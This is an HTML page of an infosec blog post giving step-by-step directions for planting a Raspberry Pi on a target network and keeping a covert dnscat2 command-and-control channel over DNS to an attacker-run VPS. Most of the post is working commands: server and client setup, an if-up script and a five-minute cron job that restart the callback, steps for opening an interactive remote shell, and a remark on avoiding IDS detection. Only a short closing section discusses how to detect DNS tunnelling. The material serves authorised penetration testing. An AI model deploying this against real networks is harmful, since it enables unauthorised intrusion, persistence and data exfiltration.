<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<head>
  <link href="https://gmpg.org/xfn/11" rel="profile">
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta name="generator" content="Hugo 0.88.1" />

  
  <meta name="viewport" content="width=device-width, initial-scale=1.0">

  <title>Persistent C2 with dnscat2 &middot; The Subtlety</title>
  <meta name="description" content="" />

  
  <link type="text/css" rel="stylesheet" href="https://www.thesubtlety.com/css/print.css" media="print">
  <link type="text/css" rel="stylesheet" href="https://www.thesubtlety.com/css/poole.css">
  <link type="text/css" rel="stylesheet" href="https://www.thesubtlety.com/css/syntax.css">
  <link type="text/css" rel="stylesheet" href="https://www.thesubtlety.com/css/hyde.css">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Abril+Fatface|PT+Sans:400,400i,700">


  
  <link rel="apple-touch-icon-precomposed" sizes="144x144" href="https://www.thesubtlety.com/apple-touch-icon-144-precomposed.png">
  <link rel="shortcut icon" href="https://www.thesubtlety.com/favicon.png">

  
  
</head>

  <body class=" ">
  <aside class="sidebar">
  <div class="container sidebar-sticky">
    <div class="sidebar-about">
      <a href="https://www.thesubtlety.com/"><h1>The Subtlety</h1></a>
      <p class="lead">
       Indiscriminate Idiotropics on Infosec 
      </p>
    </div>

    <nav>
      <ul class="sidebar-nav">
        <li><a href="https://www.thesubtlety.com/">Home</a> </li>
        <li><a href="https://www.thesubtlety.com/about/"> About </a></li><li><a href="https://github.com/thesubtlety/"> Github </a></li><li><a href="https://twitter.com/thesubtlety"> Twitter </a></li>
      </ul>
    </nav>

    <p>&copy; 2021. All rights reserved. </p>
  </div>
</aside>

    <main class="content container">
    <div class="post">
  <h1>Persistent C2 with dnscat2</h1>
  <time datetime=2016-12-19T17:19:40-0800 class="post-date">Mon, Dec 19, 2016</time>
  <p>Occasionally an environment has strict outbound rules with all traffic going through an authenticated proxy. This hampers exfiltration, especially if you don&rsquo;t currently have valid credentials but need a foothold into an environment without phishing for instance. If we can find a live network jack in some accessible place and the switch hands out an IP address via DHCP along with DNS servers, we can more than likely obtain a foothold into the network.</p>
<p>Thanks to some awesome work by <a href="https://twitter.com/iagox86">iagox86</a>, these directions can be used to configure <a href="https://github.com/iagox86/dnscat2">dnscat2</a> to automatically connect back to your server over DNS in an automated fashion, similar to a PwnPlug.</p>
<h2 id="prerequisites">Prerequisites</h2>
<ul>
<li>A linux box (raspberry pi)</li>
<li>A domain name</li>
<li>A VPS</li>
</ul>
<h2 id="directions">Directions</h2>
<h3 id="authoritative-dns">Authoritative DNS</h3>
<p>Configure an authoritative name server on the DNS provider account. Using namecheap for instance:</p>
<p>Manage Domain &gt; Advanced DNS &gt; Add Personal DNS Servers &gt; <code>ns1 == ip.ad.dre.ss</code> and <code>ns2 == ip.ad.dre.ss</code></p>
<p>Then, under Domain &gt; Use Custom DNS &gt; use <code>ns1.examplecom</code> and <code>ns2.example.com</code></p>
<p>Check this is working by running on the server: <code>sudo nc -vv -l -u -p53</code> and from another machine <code>nslookup ns1.example.com</code> to verify traffic is hitting this IP.</p>
<h3 id="set-up-dnscat2-server-side">Set up dnscat2 server side</h3>
<p>Log in to your VPS, get dnscat2, and install it.</p>
<pre><code># apt-get update
# apt-get -y install ruby-dev git make g++
# gem install bundler
# git clone https://github.com/iagox86/dnscat2.git
# cd dnscat2/server
# bundle install
</code></pre>
<p>And start the server.</p>
<pre><code># ruby /home/admin/dnscat2/server/dnscat2.rb --secret=verysecret ns1.example.com
</code></pre>
<h3 id="configure-the-clientraspberry-pi">Configure the client/Raspberry Pi</h3>
<h4 id="compile-the-dnscat2-client">Compile the dnscat2 client</h4>
<p>On the Raspberry Pi or client</p>
<pre><code>$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/client/
$ make
</code></pre>
<p>At this point you can run dnscat2 with the following to confirm things are working. We&rsquo;ll be coming back to this so no need to keep in running.</p>
<pre><code>$ sudo /home/rpi/dnscat2/client/dnscat --secret=verysecret --dns domain=ns1.example.com,type=TXT
</code></pre>
<ul>
<li>You can also leave out the domain and instead specify an ip: <code>./dnscat --dns=server=1.2.3.4,port=53</code> but this is a direct connection out port 53 which may be blocked. It also clearly shows dnscat2 on the wire and will likely be flagged by IDS/IPS</li>
<li>You can specify various DNS record types but TXT records have been fairly stable for me in the past</li>
</ul>
<h4 id="configure-persistance">Configure Persistance</h4>
<p>We want our little remote computer to always be connected to us. Every time it&rsquo;s plugged in, dnscat2 should be calling back to our infrastructure. In addition, DNS can be flaky so we always want to ensure there&rsquo;s always a callback.</p>
<p>Make <code>eth0</code> ask for a DHCP address everytime it&rsquo;s plugged in</p>
<pre><code>$cat /etc/networking/interfaces
  auto eth0
  allow-hotplug eth0
  iface eth0 inet dhcp
</code></pre>
<p>Add an <code>interface up</code> start script</p>
<pre><code>$cat /home/rpi/start_dnscat2
  #!/bin/bash    
  echo &quot;[+] Starting dnscat2...&quot;
  tmux new -s dnscat -d /home/rpi/dnscat2/client/dnscat ns1.example.com
$ln -s  /home/rpi/start_dnscat2 /etc/network/if-up.d/start_dnscat2
$chmod +x /home/rpi/start_dnscat2
</code></pre>
<p>Configure <code>cron</code> to check every five minutes if <code>dnscat2</code> is running and start it if not.</p>
<pre><code>$cat check_and_start_dnscat2.sh 
#!/bin/bash

if ! $(ps aux | grep -i &quot;[t]mux&quot; &gt; /dev/null); then
	echo &quot;[!] Starting dnscat2...&quot;
        /home/rpi/start_dnscat2
else
	echo &quot;[+] dnscat2 is running...&quot;
fi

$crontab -e
*/5 * * * * /home/rpi/check_and_start_dnscat2.sh
</code></pre>
<p>That&rsquo;s it. Now whenever an interface comes up, dnscat2 will make a connection to the configured domain and check every 5 minutes if there is a connection, starting one if not.</p>
<h3 id="dnscat2-reference">dnscat2 reference</h3>
<p>dnscat2 isn&rsquo;t super intuitive so some operational notes for quick reference:</p>
<ul>
<li>Start the server under a tmux session</li>
<li>Within the dnscat2 prompt, type <code>sessions</code> to see what you have available and interact with <code>sessions -i 1</code></li>
<li>Within a session type <code>help</code> to list available commands and <code>shell</code> then <code>session -i &lt;window#&gt;</code> for an interactive shell</li>
<li>Exit the shell session by <code>Control-z</code> or <code>exit</code></li>
</ul>
<h3 id="identifying-dnscat2-on-the-wire">Identifying dnscat2 on the wire</h3>
<p>There are number of ways to identify malicious DNS traffic and <a href="https://www.sans.org/reading-room/whitepapers/dns/detecting-dns-tunneling-34152">this SANS paper</a> details quite a few methods of identification. In addition, in this case we&rsquo;re specifying TXT records which aren&rsquo;t too common. [One paper] (<a href="http://www.caida.org/publications/papers/2007/dns_anomalies/dns_anomalies.pdf">http://www.caida.org/publications/papers/2007/dns_anomalies/dns_anomalies.pdf</a>) (Table 1) puts TXT record usage around 7% of a given large sample size. <a href="http://blog.dinaburg.org/2012/11/bitsquatting-pcap-analysis-part-2-query.html">Another</a> puts that usage at closer to less than 1%.</p>
<p>It&rsquo;s difficult to directly prevent DNS tunnelling but with a bit of traffic and payload analysis an attacker who&rsquo;s not careful is likely to be identified.</p>
<h3 id="resources">Resources</h3>
<p>Most of this info is from iagox86&rsquo;s github and Lenny Zeltser&rsquo;s write up on dnscat2.</p>
<ul>
<li><a href="https://github.com/iagox86/dnscat2">https://github.com/iagox86/dnscat2</a></li>
<li><a href="https://github.com/iagox86/dnscat2/blob/master/doc/authoritative_dns_setup.md">https://github.com/iagox86/dnscat2/blob/master/doc/authoritative_dns_setup.md</a></li>
<li><a href="https://zeltser.com/c2-dns-tunneling/">https://zeltser.com/c2-dns-tunneling/</a></li>
<li><a href="https://www.sans.org/reading-room/whitepapers/dns/detecting-dns-tunneling-34152">https://www.sans.org/reading-room/whitepapers/dns/detecting-dns-tunneling-34152</a></li>
</ul>

</div>


    </main>

    
<script type="application/javascript">
var doNotTrack = false;
if (!doNotTrack) {
	window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
	ga('create', 'UA-29425132-1', 'auto');
	
	ga('send', 'pageview');
}
</script>
<script async src='https://www.google-analytics.com/analytics.js'></script>

  </body>
</html>
